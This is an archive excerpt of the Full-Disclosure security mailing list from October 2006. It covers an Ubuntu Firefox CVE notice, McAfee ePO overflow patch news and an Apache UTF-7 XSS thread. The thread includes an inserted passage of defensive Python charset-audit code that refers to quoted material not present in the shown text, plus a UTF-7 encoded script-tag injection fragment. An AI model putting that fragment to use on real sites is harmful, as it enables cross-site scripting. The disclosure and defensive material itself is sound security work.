  mozilla-firefox-locale-es        1.5-ubuntu5.10-1
  mozilla-firefox-locale-es-ar     1.5-ubuntu5.10-1
  mozilla-firefox-locale-es-es     1.5-ubuntu5.10-1
  mozilla-firefox-locale-fi-fi     1.5-ubuntu5.10-1
  mozilla-firefox-locale-fr        1.5-ubuntu5.10-1
  mozilla-firefox-locale-fr-fr     1.5-ubuntu5.10-1
  mozilla-firefox-locale-ga-ie     1.5-ubuntu5.10-1
  mozilla-firefox-locale-gu-in     1.5-ubuntu5.10-1
  mozilla-firefox-locale-he-il     1.5-ubuntu5.10-1
  mozilla-firefox-locale-hu-hu     1.5-ubuntu5.10-1
  mozilla-firefox-locale-mk-mk     1.5-ubuntu5.10-1
  mozilla-firefox-locale-nl-nl     1.5-ubuntu5.10-1
  mozilla-firefox-locale-pa-in     1.5-ubuntu5.10-1
  mozilla-firefox-locale-pl        1.5-ubuntu5.10-1
  mozilla-firefox-locale-pl-pl     1.5-ubuntu5.10-1
  mozilla-firefox-locale-pt-br     1.5-ubuntu5.10-1
  mozilla-firefox-locale-pt-pt     1.5-ubuntu5.10-1
  mozilla-firefox-locale-ro-ro     1.5-ubuntu5.10-1
  mozilla-firefox-locale-ru-ru     1.5-ubuntu5.10-1
  mozilla-firefox-locale-sl-si     1.5-ubuntu5.10-1
  mozilla-firefox-locale-sq-al     1.5-ubuntu5.10-1
  mozilla-firefox-locale-sv        1.5-ubuntu5.10-1
  mozilla-firefox-locale-sv-se     1.5-ubuntu5.10-1
  mozilla-firefox-locale-tr-tr     1.5-ubuntu5.10-1
  mozilla-firefox-locale-xh-za     1.5-ubuntu5.10-1
  mozilla-firefox-locale-zh-cn     1.5-ubuntu5.10-1
  mozilla-firefox-locale-zh-tw     1.5-ubuntu5.10-1
  yelp                             2.12.1-0ubuntu1.1

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Since the 1.0.x series of Firefox is not supported any more, this update
introduces the firefox 1.5 series into Ubuntu 5.10. Please check whether
all your extensions still work as expected.

Details follow:

Various flaws have been reported that allow an attacker to execute
arbitrary code with user privileges by tricking the user into opening a
malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3809, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253,
CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569,
CVE-2006-4571)

Cross-site scripting vulnerabilities were found in the XPCNativeWrapper()
function and native DOM method handlers. A malicious web site could
exploit these to modify the contents or steal confidential data (such as
passwords) from other opened web pages. (CVE-2006-3802, CVE-2006-3810)

A bug was found in the script handler for automatic proxy configuration.
A malicious proxy could send scripts which could execute arbitrary code
with the user's privileges. (CVE-2006-3808)

The NSS library did not sufficiently check the padding of PKCS #1 v1.5
signatures if the exponent of the public key is 3 (which is widely used
for CAs). This could be exploited to forge valid signatures without the
need of the secret key. (CVE-2006-4340)

Jon Oberheide reported a way in which a remote attacker could trick users
into downloading arbitrary extensions while circumventing the normal SSL
certificate check. The attacker would have to be in a position to spoof
the victim's DNS, causing them to connect to sites of the attacker's
choosing rather than the sites intended by the victim.
If they gained that control and the victim accepted the attacker's cert
for the Mozilla update site, then the next update check could be hijacked
and redirected to the attacker's site without detection. (CVE-2006-4567)

Packages which embed or extend Firefox have been updated to work with the
new version.

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3.diff.gz
      Size/MD5: 175367 a26d52d72d57fa4447cdc6c4d8120d9e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3.dsc
      Size/MD5: 1056 b9d557cd0d8d2105dde2c669d958ac18
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7.orig.tar.gz
      Size/MD5: 43116523 025ca9a48809d142dd4817e396157afa
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1.diff.gz
      Size/MD5: 12508 2d1f8e2d37966901a16125834c48a5ae
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1.dsc
      Size/MD5: 1674 50224ab103882c85e8584773f70d0b0b
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10.orig.tar.gz
      Size/MD5: 532744 79e71acb839ca504f37cccf2e520abe1
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1.diff.gz
      Size/MD5: 13906 7351cceba02fb251087d19c9fada3539
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1.dsc
      Size/MD5: 2223 f1784da472d75a158d5008b72db78c29
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2.orig.tar.gz
      Size/MD5: 4657374 2232bfd4090f9f9187c84bc46f785471
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1.dsc
      Size/MD5: 616 5b63f100196cc122a0d14fb10128fe0a
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1.tar.gz
      Size/MD5: 2722120 c1b93c90799172e7939737b685849028
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10-1.diff.gz
      Size/MD5: 17550 75aba6066f369b482725b6ecafe351b5
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10-1.dsc
      Size/MD5: 1711 8643261713bcaededc638c59ddb5a639
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-all_1.5-ubuntu5.10.orig.tar.gz
      Size/MD5: 3834374 cbb9bc1c91c73b100a134ffef3527575
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1.diff.gz
      Size/MD5: 10203 52a694c6ae7dd1b2cf47d23fa405cb32
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1.dsc
      Size/MD5: 1716 a81a9690f6ae9313f143764f1577353e
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1.orig.tar.gz
      Size/MD5: 1126243 8e4a9cdacb146ee9094281a2a809de1b

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_all.deb
      Size/MD5: 49450 a96a7f73505926f9670b5db1507d8a63
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_all.deb
      Size/MD5: 50340 822d93a2f02f32e0c4b05e6a0d18d251
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.10-1ubuntu2.1_all.deb
      Size/MD5: 42554 d3a1266307910c8d97cf0a61765f6be6
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_1.8.2-0ubuntu1.1_all.deb
      Size/MD5: 155316 985cbd3ceba8913d1c6b658634f5515f
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-app-install/gnome-app-install_0+20051005.1_all.deb
      Size/MD5: 2363516 2951dc5a3fa5363484a2ded4e9d63525
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-af-za_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14920 3d8b3b0207b6dbbd50a18f44124be44d
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ast-es_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14922 ce395b5cb94745bccc6d339aeaa47af6
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-bg-bg_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 177054 301d8b790f931e8fced7d729462b119f
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-cs-cz_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 167818 1130c3f572b0c3212e19db196869e6c1
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-da-dk_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 156822 16dd2084e870f2b103e31475bab8fbc2
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-de-de_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 156254 ec05416b5cf4a1404834a91aa7780636
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-de_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14948 47a942dd614f3690468ace7dfce944a4
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-en-gb_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 153066 c6ef3d6a1796a7187064d8dd8efade2d
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es-ar_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 160414 c2d04fa793a6c8537921825ad9d3fed3
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es-es_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 146512 7c879206052a84628f2cb1dba61225a2
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-es_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14962 45b0b022da96d82426e0379789e76115
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fi-fi_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 157538 dc7d6ba83a34dc635d5ba13a6e00fb85
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fr-fr_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 218898 08bac23bc1814781169971c79e340029
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-fr_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14952 cc5d3ba9021d9c7935e88820c3b1cb22
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ga-ie_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 159686 6e7cfaad656bd78d391e87d3efdaf15c
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-gu-in_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 176464 071b3ed411c73bd2e4b3de929c59e17a
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-he-il_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 159710 61f6d12b159c9769ec245cafd3a44416
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-hu-hu_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 168628 ff688d627228681bd3578e4193ec85bc
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-mk-mk_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 176372 b2d833c6ec5a6a7be6d65cbcd852d4d6
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-nl-nl_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 166614 2ad5e24d1ab820968e352198acafe73b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pa-in_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 166320 4a3310c669c84b411c556de9be00c9ae
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pl-pl_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 256734 8fd75e6450ea6c262259d3f5c97ed0d6
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pl_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14950 d9e41ad5ebd9fa22e4e6368ccdb84e56
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pt-br_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 158306 2ebf181536dfc4fabf7264459d8168d9
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-pt-pt_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14918 cde145bb4308469314341fdce0df4150
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ro-ro_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 157404 74e2fda0bbddc1ae9494d971b8b94000
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-ru-ru_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 184988 10a5c4a5bfbbb5564e512f307d3affd0
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sl-si_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 159592 a12d61905553ac247cdd5cabfbea8266
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sq-al_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14920 3cf47efcf547af1eefcb9a37468d9264
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sv-se_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 169870 60dd6cd5b9c870fc03bd89d8ad8ba68b
    http://security.ubuntu.com/ubuntu/pool/universe/m/mozilla-firefox-locale-all/mozilla-firefox-locale-sv_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14952 716f89f697d527336ddc754422b61f9e
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-tr-tr_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 150822 e655fabf918cde4d5dbec858198dfc2b
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-xh-za_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 14924 5d0a3d18420c2dceb9943098b1cc5edb
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-zh-cn_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 150806 2bf7032ceccd2f2691d4210711ce533b
    http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-all/mozilla-firefox-locale-zh-tw_1.5-ubuntu5.10-1_all.deb
      Size/MD5: 141592 c4ab2103bcd210600bf2180b57e4c0a4

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb
      Size/MD5: 3151994 d6fbafaa57ddf56a5d2c15d0d0b7a54a
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb
      Size/MD5: 216360 ada223fd220cc75f1cf061cd44294a1c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb
      Size/MD5: 82664 be7890c0fa145f6a1e76e9abdbfd500f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_amd64.deb
      Size/MD5: 10222068 bccb7d71de1abbe3036fe130d5f5d1a0
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_amd64.deb
      Size/MD5: 48324 ad3fbfef83d3cf097e377be6dd9e0f75
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_amd64.deb
      Size/MD5: 2079044 4aee57db6320497c7739f70ef350f752
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_amd64.deb
      Size/MD5: 72862 1e41cee42bd67a3dbe0aaf4d9b1d8bae
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_amd64.deb
      Size/MD5: 71654 6a79359848bfa3324b9619db75431060
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_amd64.deb
      Size/MD5: 229922 b1f9ca522767d93f64e59ada4fe01ec7

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb
      Size/MD5: 3152010 59a8bc4edc49fcd2ec6a0b905ae3b4fe
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb
      Size/MD5: 209884 8ec25aa9f564f83747edc4998a54a7e1
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb
      Size/MD5: 75022 1e84dccc6587ae34f3f201c21d15e8b6
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_i386.deb
      Size/MD5: 8644430 4c998b81cbdd13cff81cbf77c18edf9b
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_i386.deb
      Size/MD5: 48072 c032680500dc8c5d47ef50cf458c8bb0
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_i386.deb
      Size/MD5: 2036736 50122be5b65d5cbfe84a3f103be32100
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_i386.deb
      Size/MD5: 69370 1b0c3dbdf68c4026c39e4a20cd32f4f1
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_i386.deb
      Size/MD5: 65234 838439c919084ee33c3f36a82d51d0a9
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_i386.deb
      Size/MD5: 220626 2b86b96b577e9c67b68aeb92a37e7ef1

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb
      Size/MD5: 3152066 ecbc956d8fdd0b70cda57dad123005af
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb
      Size/MD5: 213294 e83df33479eb5a7c075394ad48c2686c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb
      Size/MD5: 78272 3702fb290fc9a477f43b72372d9e9029
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.7-0ubuntu5.10.3_powerpc.deb
      Size/MD5: 9826234 5bedd17d1e16eff3e1876798e675350f
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.10-1ubuntu2.1_powerpc.deb
      Size/MD5: 49832 84caef479729caf65c18e90bc3f023a1
    http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.8.2-0ubuntu1.1_powerpc.deb
      Size/MD5: 2056216 e384f64d7861c356659504e4c440be81
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.10-1ubuntu2.1_powerpc.deb
      Size/MD5: 70986 15343da493ea42d99fc5a9ac63e398f6
    http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.10-1ubuntu2.1_powerpc.deb
      Size/MD5: 72078 e55e86a842651dddefef98ab21ddb106
    http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.12.1-0ubuntu1.1_powerpc.deb
      Size/MD5: 225382 7f30ecd915d851c66791fbfddebb5c49

From virus at nolog.org Mon Oct 2 14:26:04 2006
From: virus at nolog.org (virus at nolog.org)
Date: Mon, 02 Oct 2006 15:26:04 +0200
Subject: [Full-disclosure] McAfee EPO Buffer Overflow
In-Reply-To: <000f01c6e5c5$dbd20510$2100a8c0@kamau>
References: <000f01c6e5c5$dbd20510$2100a8c0@kamau>
Message-ID: <4521136C.2060806@nolog.org>

Hi,

muts wrote:
> [-] Vendor Status
>
> Vendor was notified July 14th, 2006. ehm.

and more:

Advisory published:
http://knowledge.mcafee.com/SupportSite/search.do?cmd=displayKC&docType=kc&externalId=8611438&sliceId=SAL_Public&dialogID=2997768&stateId=0%200%202995803

patch already provided.

GTi

From taosecurity at gmail.com Mon Oct 2 12:28:20 2006
From: taosecurity at gmail.com (Richard Bejtlich)
Date: Mon, 2 Oct 2006 07:28:20 -0400
Subject: [Full-disclosure] Security Rss Feeds
Message-ID: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com>

crazy frog crazy frog wrote:
> thanks all for sharing,
> i found around 240+ list of various security related RSS Feeds. Get it here:-
> http://www.secgeeks.infys.net/security_rss_feeds
>
> _CF

That's an interesting list, especially since it's mine

http://www.bloglines.com/public/TaoSecurity

starting with the 23rd entry for Bloglines and continuing another 200+ entries.
I knew people were republishing my blog with their name on my content.
I didn't know they were doing the same with my Bloglines choices.

Richard
http://taosecurity.blogspot.com

From chris at get-tuf.com Mon Oct 2 17:15:59 2006
From: chris at get-tuf.com (Chris Brown)
Date: Mon, 2 Oct 2006 17:15:59 +0100
Subject: [Full-disclosure] McAfee EPO Buffer Overflow
Message-ID: <000401c6e63e$0d5409d0$0300a8c0@gettuf001>

[-] Vendor Status

A patch has been posted to the McAfee.com download site..

From i.m.crazy.frog at gmail.com Mon Oct 2 17:52:16 2006
From: i.m.crazy.frog at gmail.com (crazy frog crazy frog)
Date: Mon, 2 Oct 2006 22:22:16 +0530
Subject: [Full-disclosure] Security Rss Feeds
In-Reply-To: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com>
References: <120ef0530610020428wb4e80d6k76b0cd23f619e0f0@mail.gmail.com>
Message-ID: <41011d980610020952n13061947g323dcf4f148a56c1@mail.gmail.com>

yes i forgot to mention your name.

On 10/2/06, Richard Bejtlich wrote:
> crazy frog crazy frog wrote:
>
> > thanks all for sharing,
> > i found around 240+ list of various security related RSS Feeds. Get it here:-
> > http://www.secgeeks.infys.net/security_rss_feeds
> >
> > _CF
>
> That's an interesting list, especially since it's mine
>
> http://www.bloglines.com/public/TaoSecurity
>
> starting with the 23rd entry for Bloglines and continuing another 200+ entries.
>
> I knew people were republishing my blog with their name on my content.
> I didn't know they were doing the same with my Bloglines choices.
>
> Richard
> http://taosecurity.blogspot.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
---------------------------------------
http://www.secgeeks.com
---------------------------------------
ting ding ting ding ting ding ting ding ting ding ding
i m crazy frog :)
"oh yeah oh yeah... another wannabe, in hackerland!!!"

From steven.mcgrath at chigeek.com Mon Oct 2 17:21:11 2006
From: steven.mcgrath at chigeek.com (Steven McGrath)
Date: Mon, 2 Oct 2006 11:21:11 -0500
Subject: [Full-disclosure] October Chicago 2600/DC312 Meeting Information
Message-ID: <28326b7c0610020921y45b35d4ckf2a6c34f834c6f1f@mail.gmail.com>

The October Chicago 2600/DC312 Meeting is near! The meeting will be this
Friday at the Neighborhood Boys and Girls Club and will feature much of the
same usual fun that all of you have grown to expect!

[Presentation Information]
- 9.00pm - Installing and Configuring Snort (Maniac)

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, Oct. 6th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net
From pauls at utdallas.edu Mon Oct 2 18:41:32 2006
From: pauls at utdallas.edu (Paul Schmehl)
Date: Mon, 02 Oct 2006 12:41:32 -0500
Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
In-Reply-To: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com>
References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com>
Message-ID:

--On October 2, 2006 9:44:27 AM -0400 Brian Eaton wrote:
>
> I'm guessing that you tested a server with some kind of customized 404
> response that neglected to include a charset specification. That's
> not a vulnerability in Apache, that is poor site configuration.
>

Brian, a question for clarification. When you say "customized 404
response", you are not referring to a customized error document (as
described briefly in the httpd.conf file) but rather to having changed the
headers that the server returns when queried with a GET request, correct?
And wouldn't this require changing source code and compiling a custom
build of apache?

Paul Schmehl (pauls at utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
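Brian Eaton's point earlier in this thread is that the UTF-7 trick only works when neither the HTTP Content-Type header nor the HTML itself declares a charset, so the browser falls back to autodetection. As an added example, not code from any participant in the thread or from Apache, here is a small Python audit that applies exactly that test to a response: it reports which charset is declared and where, flags HTML responses that declare none, and decodes the "+ADw-" / "+AD4-" sequences quoted above so it is clear what a sniffing browser would see. The three responses are constructed for the demo, not captured from a real server; the names default_404, custom_404_no_charset and custom_404_meta are mine.

```python
import codecs
import re

# charset parameter inside a Content-Type header value, quoted or not
CHARSET_PARAM_RE = re.compile(r'charset\s*=\s*"?([A-Za-z0-9._:-]+)"?', re.IGNORECASE)
# Covers both <meta http-equiv="Content-Type" content="text/html; charset=X">
# and the newer <meta charset="X"> form.
META_CHARSET_RE = re.compile(
    r'<meta\b[^>]*\bcharset\s*=\s*["\']?([A-Za-z0-9._:-]+)', re.IGNORECASE
)


def _content_type(headers):
    """Case-insensitive lookup of the Content-Type header value ('' if absent)."""
    return {k.lower(): v for k, v in headers.items()}.get("content-type", "")


def declared_charset(headers, body):
    """Return (charset, source) with source 'header', 'meta' or None.

    The HTTP header is authoritative, so it is consulted before the document.
    """
    m = CHARSET_PARAM_RE.search(_content_type(headers))
    if m:
        return m.group(1).lower(), "header"
    m = META_CHARSET_RE.search(body)
    if m:
        return m.group(1).lower(), "meta"
    return None, None


def at_risk_of_sniffing(headers, body):
    """True when the response is text/html and no charset is declared anywhere."""
    is_html = _content_type(headers).split(";")[0].strip().lower() == "text/html"
    return is_html and declared_charset(headers, body)[0] is None


def utf7_decode(text):
    """What a browser that has guessed UTF-7 makes of the escapes in the thread."""
    return codecs.decode(text.encode("ascii"), "utf-7")


# Constructed sample responses (header dict, body); not real server output.
SAMPLES = {
    # what Brian saw from stock Apache 1.3.37 / 2.2.3: charset in the header
    "default_404": (
        {"Content-Type": "text/html; charset=iso-8859-1"},
        "<html><body><h1>Not Found</h1></body></html>",
    ),
    # a custom error page with no charset in the header or the HTML
    "custom_404_no_charset": (
        {"Content-Type": "text/html"},
        "<html><body><h1>Not Found</h1><p>The requested URL was not found.</p></body></html>",
    ),
    # the same page carrying the meta http-equiv declaration
    "custom_404_meta": (
        {"Content-Type": "text/html"},
        '<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
        "</head><body><h1>Not Found</h1></body></html>",
    ),
}


def audit(samples=SAMPLES):
    """Map each sample name to (charset, source, at_risk)."""
    return {
        name: declared_charset(h, b) + (at_risk_of_sniffing(h, b),)
        for name, (h, b) in samples.items()
    }


if __name__ == "__main__":
    for name, (charset, source, risk) in audit().items():
        print(f"{name:24s} charset={charset} via={source} at_risk={risk}")
    print(utf7_decode("+ADw-SCRIPT+AD4-"))
```

The header wins over the document, so the simplest server-side fix is to put the charset in the Content-Type header for error pages as well (in Apache, the AddDefaultCharset directive does this globally); a meta http-equiv tag in the custom error document, as Brian suggests, is the fix when you only control the page body.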
From debasis.mohanty.listmails at gmail.com Tue Oct 3 07:24:01 2006
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Date: Mon, 2 Oct 2006 23:24:01 -0700
Subject: [Full-disclosure] McAfee EPO Buffer Overflow
In-Reply-To: <000f01c6e5c5$dbd20510$2100a8c0@kamau>
Message-ID: <4521520e.736207fa.08af.35fc@mx.gmail.com>

An extremely neat work muts !! :)

-d

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of muts
Sent: Sunday, October 01, 2006 6:56 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] McAfee EPO Buffer Overflow

###################################################################
#                                                                 #
#  McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow  #
#                                                                 #
#                     www.remote-exploit.org                      #
#                                                                 #
#                   muts {at} remote-exploit org                  #
###################################################################

